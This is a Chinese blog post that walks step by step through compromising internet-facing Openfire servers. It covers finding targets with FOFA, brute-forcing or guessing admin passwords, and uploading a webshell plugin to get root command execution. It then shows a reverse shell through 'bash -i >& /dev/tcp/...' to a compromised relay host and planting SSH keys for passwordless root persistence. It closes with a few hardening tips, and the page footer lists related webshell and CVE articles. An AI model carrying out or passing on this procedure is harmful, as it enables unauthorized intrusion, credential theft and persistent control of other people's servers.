OpenFire后台插件上传获取webshell及免密码登录linux服务器

最新推荐文章于 2023-06-15 15:56:54 发布
最新推荐文章于 2023-06-15 15:56:54 发布
阅读量788 收藏 1
点赞数
文章标签: shell 操作系统 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34342905/article/details/85168826
版权

     本次***源于高校任务,在***过程中发现,对方IP地址段安装有opernfire,服务器8080端口可以正常访问,后面通过了解Openfire是开源的、基于可拓展通讯和表示协议(XMPP)、采用Java编程语言开发的实时协作服务器。 Openfire安装和使用都非常简单,并利用Web进行管理,单台服务器可支持上万并发用户,一般在大型企业用的比较多。OpenfireJboss类似,也可以通过插件上传来获取Webshell,只是Openfire的插件需要修改代码并进行编译,经过研究测试,只要有登录账号,通过上传插件可以获取webshell,一般获取的权限都较高为root系统权限,国外服务器一般单独给Openfire权限,下面是整个***过程。

1.目标获取

1fofa.so网站使用搜索body="Openfire,版本: " && country=JP,可以获取日本存在的Openfire服务器。如图1所示。


141cf2a93e5cd9964039ee3b913bd0b2.jpg-wh_

1搜索目标

2.暴力或者使用弱口令登录系统

   一般弱口令admin/adminadmin/admin888admin/123456,如果不是这些请直接使用burpsuite进行暴力破解,能够正常访问的网站,如图2所示,openfire可能开放不同端口。

5a14b76c6927321429d3499736f7a693.jpg-wh_

2openfire后台登陆地址

3.进入后台

   输入密码正确后,如图3所示,进入后台,可以查看服务器设置,查看用户/用户群,查看会话,分组聊天以及插件等信息。

8820232d21c60400504311b54335dd2c.jpg-wh_3进入后台

4.查看并上传插件

   单击插件,再其中可以看到所有的插件列表,在上传插件下单击上传插件,选择专门生成的openfirewebshell的插件,如图4所示。

7e8f5d8a485696f9be1d4b231b79f8d7.jpg-wh_

4上传插件

在本次测试中,从互联网收集了连个插件,如图5所示,均成功上传。

3abe88f057b3f08f4d111009e5f859e4.jpg-wh_

5上传带webshell的插件

5.获取webshell

1helloworld插件获取webshell

  单击服务器-服务器设置,如图6所示,如果helloworld插件上传并运行成功,则会在配置文件下面生成一个用户接口设置。单击该链接即可获取webshel,如图7所示。

a910926703829d314fef4df59a355aef.jpg-wh_

6查看服务器设置

5dd528ef3c2dd0dea41a0b39b012a5d5.jpg-wh_

7获取webshell

2broadcast插件获取webshell

   通过url+ plugins/broadcast/webshell文件名称来和获取:

http://xxx.xxx.xxx.xxx:8080/plugins/broadcast/cmd.jsp?cmd=whoami

http://xxx.xxx.xxx.xxx:8080/plugins/broadcast/browser.jsp

   helloworld插件中也可以通过地址来获取

http://xxx.xxx.xxx.xxx:8080/plugins/helloworld/chakan.jsp

  如图8,图9所示,分别获取broadcastwebshell以及查看当前用户权限为root

a830a6f4a6cd0632f8557c74bade1015.jpg-wh_

8获取当前用户权限

2a4fbe6c0d3a45e51027788734b4dbd8.jpg-wh_

9获取webshell

6.root密码登录服务器

   ***到这里按照过去的思路应该已经结束,不过笔者还想尝试另外一种思路,虽然我们通过webshell可以获取/etc/shadow文件,但该root及其它用户的密码明显不是那么容易被破解的。服务器上面用ssh,能否利用公私钥来解决访问问题。

1)反弹到肉鸡

执行一下命令,将该服务器反弹到肉鸡服务器xxx.xxx.xxx.xxx8080端口,需要提前使用nc监听8080端口,也即执行“nc-vv -l -p 8080”如图10所示。

fcaa09ea3bf1c3cc0ec7c3a99aedcc6b.jpg-wh_

10监听8080端口

2)反弹shell到肉鸡

执行命令“bash -i>& /dev/tcp/xxx.xxx.xxx.xxx/8080 0>&1”反弹到肉鸡,如图11所示,获取一个反弹shell

ef091100f96d18cf15a5c9ffcf562105.jpg-wh_

11反弹shell

7.实际操作流程

1)远程服务器生成公私钥

 在被***的服务器上执行“ssh-keygen -t rsa”命令,默认三次回车,如图12所示,会在root/.ssh/目录下生成id_rsaid_rsa.pub,其中id_rsa为服务器私钥,特别重要,id_rsa.pub为公钥。

1b8dcb5686c26f2b3741ce965325d1d2.jpg-wh_

12在远处服务器上生成公私钥

2)本地linux 上生成公私钥

  在本地linux上执行命令ssh-keygen -t rsa”生成公私钥,将远程服务器的id_rsa下载到本地,执行命令“cat id_rsa > /root/.ssh/authorized_keys”命令,将远处服务器的私钥生成到authorized_keys文件。

3)将本地公钥上传到远程服务器上并生成authorized_keys

catid_rsa.pub >/root/.ssh/authorized_keys

4)删除多余文件

rmid_rsa.pub

rmid_rsa

5)登录服务器

   使用sshroot@1xx.1xx.111.1xx”登录服务器,不用输入远程服务器的密码,达到完美登录服务器的目的。

8总结

1Openfire需要获取管理员帐号和密码,目前通杀所有帮本。Openfire最新版本为4.1.5.

2)可以通过burpsuite进行admin管理员帐号的暴力破解。

3)使用openfire安全加固,可以使用强密码,同时严格设置插件权限,建议除了必须的插件目录外,禁用新创建目录。

weixin_34342905
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Openfire消息记录插件(消息、上传、下载插件合集)
04-13
openfire插件,本插件直接在openfire里安装即可,集成消息在线和离线的存储、查询接口,图片、表情、语音文件的上传和下载对外接口,因此,不需要修改openfire源码即可满足聊天的实用功能,对外提供3个接口,一消息历史记录返回xml/json 二上传文件接口 三 下载文件接口.
漏洞复现学习:openfire鉴权绕过漏洞复现(CVE-2024-32315)_openfireadministrationconsole(1)
最新发布
m0_59117112的博客
04-16 483
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
openfire插件
07-31
openfire插件基本代码,可以重复利用
插件开发一】开发简单OpenFire插件
majian_1987的专栏
08-07 9223
废话不说,直接进入主题。(如何部署、运行OF源码,请参照别的文章)。 1.部署成功后的openfire源码如下图, 2.转到Navigator视图下, 3.看of的插件目录结构,以后自己生成的插件目录结构也应该是这种结构的, 4.再回到Packager Explorer视图下,右键->new->source foulder,创建一个源代码目录, 5.在源代
[转]Openfire后台getshell(编译好的插件
weixin_33994429的博客
03-21 2019
0x01 环境:eclipse+openfire源码 源码地址:http://www.igniterealtime.org... 最新版openfire安装方法可参考:http://www.51itong.net/openfi... 0x02 webshell插件生成方法 插件生成思路:将自己想使用的jsp马或者其他辅助jsp加入到已有的...
openfire shell插件
06-15
openfire shell插件
openfire服务器插件
11-29
Openfire服务器插件是针对Openfire即时通讯服务器的扩展组件,旨在增强服务器的功能和管理能力。Openfire是一款基于Java开发的开源XMPP(Extensible Messaging and Presence Protocol)服务器,广泛应用于企业内部...
基于Openfire服务器的用户行为审计插件设计与实现
01-27
针对Openfire用户线上行为监测与审计的实际需求,设计和实现了一个基于Openfire服务器的用户行为审计插件actionAuditor。插件由3大模块组成,能实现用户行为记录、查询、存储、备份、导出、排序、统计分析以及免审计...
openfire服务器安装配置、集成、插件安装配置、参数优化.docx
12-01
本文档主要介绍了如何在Linux环境下安装、配置、集成Openfire服务器,以及进行插件安装和参数优化。 首先,确保在服务器上已经安装了JDK 1.7_80环境,因为Openfire运行需要Java支持。接着,解压Openfire的安装包`...
基于Openfire服务器的用户行为审计插件设计与实现.pdf
11-27
基于Openfire服务器的用户行为审计插件设计与实现 本文设计和实现了一个基于Openfire服务器的用户行为审计插件,名为actionAuditor。该插件由三个模块组成,能够实现用户行为记录、查询、存储、备份、导出、排序、...
openfire编译
流光的博客
11-08 470
1、openfire_src_3_10_2.zip解压到workspace,改文件夹名为openfire。 2、复制/openfire/build/eclipse下的classpath、project、settings到/openfire下,改名.classpath、.project、.settings。(可以通过复制其他项目文件或命令行改名) 3、eclipse->import->Exist
Oday,简单拿webshell
weixin_34417814的博客
03-30 141
关键字:inurl:urlProblem.asp 谷歌一下~ 找个站打开 然后 替换存在漏洞 的文件 /admin/include/upload_form.asp 把这个文件urlProblem.asp 替换成 上面的漏洞地址。 enter~ 然后传马吧~ 转载于:https://blog.51cto.com/smasher/289517...
web安全之Openfire的脚本上传缺陷分析
si1ence的博客
01-11 403
0x0 背景 一次偶然的机会发现某台Web服务器被黑了之后被植入了挖矿病毒,然后忙活了好久清理完病毒之后就开始思考思考到底是怎么被黑的,俗话说的好死要死得明白。 服务器本身只开发了外网的web端口,然后初步怀疑是从web服务端进来的于是先用D盾查杀一下果不出所料查杀出一个webshell,路径却在Openfire目录下以前没有接触过这个玩意遂研究之。 0x1 功能介绍 Openfire 是基于XMPP 协议的IM 的服务器端的一个实现,虽然当两个用户连接后,可以通过点...
openfire部署
m0_47073109的博客
12-02 890
1. 安装Mysql,JDK 配置安装Mysql 创建创建新的数据库:openfire 安装JDK 2. 安装Openfire 文件下载官网下载地址:https://download.igniterealtime.org/openfire/openfire_4_6_4.tar.gz 部署文件下载地址: 将文件上传到/opt目录: cd /opt 进行解压: tar -zxvf openfire_4_6_4.tar.gz 将解压后的文件移动到 /home/ltree/tools 目录
后台简单拿webshell
weixin_33691700的博客
01-07 215
我随便找了个后台,还是以前写帖子找的,这里我给你们用户名和密码吧! admin appliedtek101. 工具: WSockExpert.exe抓包工具,明小子 打开抓包工具的界面,你会看到什么也没有,然后注意点 左上面那小文件夹图标 ,然后出现选择那个iexplore.exe,找到企业后台管理,然后点o...
Openfire身份认证绕过漏洞复现+利用(CVE-2023-32315)
0xSec
06-15 8678
Openfire的管理控制台是一个基于 Web 的应用程序,被发现可以使用路径遍历的方式绕过权限校验。成功利用后,未经身份验证的用户可以访问 Openfire 管理控制台中的后台页面。同时由于Openfire管理控制台的后台提供了安装插件的功能,所以攻击者可以通过安装恶意插件达成远程代码执行的效果。
Get Shell! — 绕过防护上传木马
qq_52108058的博客
11-14 783
web的含义显然是需要服务器开放web服务shell是一个人机交互页面拿shell的含义是取得对服务器/电脑某种程度上的操作权限webshell拿到网站服务器的权限(shell)木马可以帮助我们拿到shell,以达到控制网站服务器的目的,也有人称之为网站的后门工具。
Linux安装Openfire、Spark
Android菜鸟的专栏
02-19 497
首先要安装好JDK,安装教程:https://blog.csdn.net/android_cai_niao/article/details/113858663 安装Spark,参照JDK的安装即可。 启动Spark 假设Spark安装在:/usr/local/Spark目录下,则cmd先进入到该目录下: cd /usr/local/Spark 然后有以下几种方式可以启动Spark,输入命令: Spark .Spark ./Spark bash Spark sh Spark 快捷方式:..

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值